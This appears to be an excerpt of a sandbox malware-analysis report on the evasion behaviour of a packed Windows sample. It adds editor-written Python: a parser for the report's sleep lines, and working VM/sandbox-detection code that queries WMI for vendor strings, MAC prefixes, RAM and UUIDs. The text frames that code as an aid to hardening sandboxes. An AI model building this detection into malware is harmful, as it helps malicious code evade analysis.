              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Code function: 1_2_00007FFDFB0032F6 rdtsc 1_2_00007FFDFB0032F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (16 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 501
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2168
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4157
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2338
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 574
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\python310.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_ssl.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_decimal.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_hashlib.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pyd
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_0-17039)
Source: C:\Users\user\Desktop\e45AiBoV6X.exe | API coverage: 4.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 | Thread sleep count: 6319 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664 | Thread sleep count: 213 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep count: 6260 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 | Thread sleep count: 130 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5592 | Thread sleep count: 501 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 | Thread sleep count: 4129 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 | Thread sleep count: 2168 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 | Thread sleep count: 4157 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 | Thread sleep count: 2338 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep count: 3039 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep count: 263 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468 | Thread sleep count: 2596 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 | Thread sleep count: 1015 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208 | Thread sleep count: 2864 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3336 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208 | Thread sleep count: 574 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep time: -922337203685477s >= -30000s
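The "Thread delayed" and "Thread sleep" evidence above is dominated by one number, 922337203685477, and small multiples of it (2x, 3x, 5x, 12x). That value is Int64.MaxValue / 10000, i.e. TimeSpan.MaxValue expressed in milliseconds, which is what an infinite-timeout wait in the .NET runtime hosting powershell.exe looks like to the sandbox; the interpretation that these lines are runtime waits rather than sleeps chosen by the script is this editor's, not the report's. The following triage helper is an added example, not code from the report or from the analysed sample. It parses the report's own text lines, flags the sentinel, and leaves the sleep-loop counts (the "> 30" lines) and any genuinely long sleep for the analyst; the threshold values 30000 ms and 30 are the ones the report itself prints, and the sample line for TID 9999 is constructed.

```python
"""Triage of the 'Thread sleep' / 'Thread delayed' evidence lines of a Joe Sandbox
report. Added example: not code from the report or from the analysed sample.
It parses the report's own text and separates the .NET infinite-wait sentinel
(an interpretation, see TIMESPAN_MAX_MS) from sleeps an analyst should look at."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Int64.MaxValue ticks / 10 000 ticks per millisecond = TimeSpan.MaxValue in ms.
# This is exactly the 922337203685477 that recurs on the powershell.exe lines above.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 30_000     # the report's own threshold ("... >= -30000s")
LOOP_COUNT = 30            # the report's own threshold ("... > 30")

# Accepts the report's fused form ("TID: 7960Thread sleep ...") as well as a
# version with a "|" column separator.
_SLEEP_RE = re.compile(
    r"TID:\s*(?P<tid>\d+)\s*\|?\s*Thread sleep (?P<kind>count|time):\s*(?P<value>-?\d+)"
)
_DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(?P<value>-?\d+)")

Parsed = Tuple[Optional[int], str, int]   # (thread id or None, kind, value)


def parse_line(line: str) -> Optional[Parsed]:
    """Extract (tid, kind, value); kind is 'count', 'time' or 'delay'."""
    m = _SLEEP_RE.search(line)
    if m:
        return int(m["tid"]), m["kind"], int(m["value"])
    m = _DELAY_RE.search(line)
    if m:
        return None, "delay", int(m["value"])
    return None


def classify_interval(value_ms: int) -> str:
    """Interpretation: an exact multiple of TimeSpan.MaxValue is the runtime's
    infinite-timeout wait (the report adds up several waits of one thread into
    one number), not a sleep the script chose."""
    v = abs(value_ms)
    if v and v % TIMESPAN_MAX_MS == 0:
        return "infinite-wait-sentinel"
    if v >= LONG_SLEEP_MS:
        return "long-sleep"
    return "short-sleep"


def triage(lines: List[str]) -> Tuple[Dict[str, int], Dict[int, List[str]]]:
    """Count each class of evidence and record which thread produced it."""
    summary: Counter = Counter()
    per_tid: Dict[int, List[str]] = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        tid, kind, value = parsed
        if kind == "count":
            label = "sleep-loop" if value > LOOP_COUNT else "sleep-count"
        else:
            label = classify_interval(value)
        summary[label] += 1
        if tid is not None:
            per_tid.setdefault(tid, []).append(label)
    return dict(summary), per_tid


# Sample input: lines taken from the report above with the path column shortened,
# plus one constructed line (TID 9999) so that the long-sleep branch is exercised.
SAMPLE_LINES = [
    "Source: powershell.exe TID: 7660Thread sleep count: 6319 > 30Jump to behavior",
    "Source: powershell.exe TID: 7664Thread sleep count: 213 > 30Jump to behavior",
    "Source: powershell.exe TID: 7960Thread sleep time: -2767011611056431s >= -30000s",
    "Source: powershell.exe TID: 7692Thread sleep time: -922337203685477s >= -30000s",
    "Source: powershell.exe TID: 5572Thread sleep time: -11068046444225724s >= -30000s",
    "Source: powershell.exe Thread delayed: delay time: 922337203685477",
    "Source: powershell.exe TID: 9999Thread sleep time: -60000s >= -30000s",   # constructed
]

if __name__ == "__main__":
    counts, threads = triage(SAMPLE_LINES)
    print(counts)    # {'sleep-loop': 2, 'infinite-wait-sentinel': 4, 'long-sleep': 1}
    print(threads)
```

Run against the full evidence list, every "Thread sleep time" line of this report classifies as the sentinel; what remains as real evasion evidence is the set of sleep loops with thousands of iterations in the same powershell.exe threads and the rdtsc timing check in the sample's own code, which this helper deliberately does not try to explain away.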
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS (2 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem (2 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (2 identical entries)
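The WMI evidence in this section (the Win32_NetworkAdapter queries earlier and the Win32_BIOS, Win32_ComputerSystem, Win32_ComputerSystemProduct.UUID, TotalPhysicalMemory and Win32_Processor queries here) comes from two kinds of process: systeminfo.exe and getmac.exe issue such queries as part of their normal output, whereas the WMIC.exe SELECT statements are the sample asking exactly the questions a VM check needs answered. The block below is an added example, not code from the report or from the analysed sample, showing what a stealer can build from those answers and, read the other way, which values a sandbox has to present to pass. The vendor markers, MAC OUIs, the 4 GiB RAM and 2-core thresholds and the stand-in UUID deny-list are this example's own assumptions, and the two inventories are constructed; the live collector uses wmic.exe the way WMIC.exe is used in the report and only runs on Windows.

```python
"""VM/sandbox fingerprinting from the WMI classes listed in the report.
Added example: not code from the report or from the analysed sample.
Thresholds, vendor markers and the stand-in UUID deny-list are this
example's own assumptions, chosen to illustrate the technique."""
import platform
import subprocess
from typing import Dict, List

Inventory = Dict[str, Dict[str, List[str]]]   # {WMI class: {property: [values]}}

# First three octets of MAC addresses assigned to virtualisation vendors.
VM_MAC_OUIS = {
    "00:05:69": "VMware", "00:0C:29": "VMware", "00:1C:14": "VMware", "00:50:56": "VMware",
    "08:00:27": "VirtualBox", "00:15:5D": "Hyper-V", "52:54:00": "QEMU/KVM",
}
VM_VENDOR_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "xen", "parallels", "virtual machine")
KNOWN_SANDBOX_UUIDS = {"00000000-0000-0000-0000-000000000000"}  # stand-in deny-list entry
MIN_RAM_BYTES = 4 * 1024**3   # assumption: heuristic threshold
MIN_CORES = 2                 # assumption: heuristic threshold

# The classes the report shows being queried, with the properties a fingerprint reads.
WANTED = {
    "Win32_ComputerSystem": ["Manufacturer", "Model", "TotalPhysicalMemory"],
    "Win32_BIOS": ["SerialNumber"],
    "Win32_ComputerSystemProduct": ["UUID"],
    "Win32_Processor": ["NumberOfCores"],
    "Win32_NetworkAdapter": ["MACAddress"],
}


def collect_live() -> Inventory:
    """Issue the queries through wmic.exe, as WMIC.exe does in the report (Windows only)."""
    inv: Inventory = {}
    if platform.system() != "Windows":
        return inv
    for cls, props in WANTED.items():
        out = subprocess.run(["wmic", "path", cls, "get", ",".join(props), "/value"],
                             capture_output=True, text=True, check=False).stdout
        bucket = inv.setdefault(cls, {})
        for line in out.splitlines():           # "/value" prints one "Property=value" per line
            if "=" in line:
                key, val = line.split("=", 1)
                if val.strip():
                    bucket.setdefault(key.strip(), []).append(val.strip())
    return inv


def _first(inv: Inventory, cls: str, prop: str, default: str = "") -> str:
    vals = inv.get(cls, {}).get(prop, [])
    return vals[0] if vals else default


def assess(inv: Inventory) -> List[str]:
    """Return the VM/sandbox indicators found in an inventory (empty list = looks physical)."""
    findings: List[str] = []
    vendor_text = " ".join([
        _first(inv, "Win32_ComputerSystem", "Manufacturer"),
        _first(inv, "Win32_ComputerSystem", "Model"),
        _first(inv, "Win32_BIOS", "SerialNumber"),
    ]).lower()
    findings += [f"vendor string mentions {m!r}" for m in VM_VENDOR_MARKERS if m in vendor_text]
    ram = int(_first(inv, "Win32_ComputerSystem", "TotalPhysicalMemory", "0") or 0)
    if 0 < ram < MIN_RAM_BYTES:
        findings.append(f"low RAM: {ram // 1024**2} MiB")
    cores = int(_first(inv, "Win32_Processor", "NumberOfCores", "0") or 0)
    if 0 < cores < MIN_CORES:
        findings.append(f"only {cores} CPU core(s)")
    for mac in inv.get("Win32_NetworkAdapter", {}).get("MACAddress", []):
        vendor = VM_MAC_OUIS.get(mac.upper()[:8])
        if vendor:
            findings.append(f"MAC OUI {mac[:8]} belongs to {vendor}")
    if _first(inv, "Win32_ComputerSystemProduct", "UUID").upper() in KNOWN_SANDBOX_UUIDS:
        findings.append("system UUID is on the deny-list")
    return findings


# Constructed inventories (not real hosts) so the rules can be exercised offline.
SANDBOX_LIKE: Inventory = {
    "Win32_ComputerSystem": {"Manufacturer": ["innotek GmbH"], "Model": ["VirtualBox"],
                             "TotalPhysicalMemory": [str(2 * 1024**3)]},
    "Win32_BIOS": {"SerialNumber": ["0"]},
    "Win32_ComputerSystemProduct": {"UUID": ["00000000-0000-0000-0000-000000000000"]},
    "Win32_Processor": {"NumberOfCores": ["1"]},
    "Win32_NetworkAdapter": {"MACAddress": ["08:00:27:12:34:56"]},
}
WORKSTATION_LIKE: Inventory = {
    "Win32_ComputerSystem": {"Manufacturer": ["Dell Inc."], "Model": ["Latitude 7420"],
                             "TotalPhysicalMemory": [str(16 * 1024**3)]},
    "Win32_BIOS": {"SerialNumber": ["7XK9Q33"]},
    "Win32_ComputerSystemProduct": {"UUID": ["4C4C4544-0058-4B10-8039-C4C04F513333"]},
    "Win32_Processor": {"NumberOfCores": ["4"]},
    "Win32_NetworkAdapter": {"MACAddress": ["A4:BB:6D:11:22:33"]},
}

if __name__ == "__main__":
    for name, inv in (("sandbox-like", SANDBOX_LIKE), ("workstation-like", WORKSTATION_LIKE)):
        print(name, assess(inv))
    live = collect_live()
    if live:
        print("this host", assess(live))
```

For sandbox hardening the useful direction is the reverse one: run `assess(collect_live())` inside the analysis VM and keep changing the exposed manufacturer, BIOS serial, UUID, MAC prefix, RAM and core count until it returns an empty list, because every remaining finding is a question the sample can ask with the same WMIC.exe queries recorded above.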
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed (2 identical entries)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (18 identical entries)
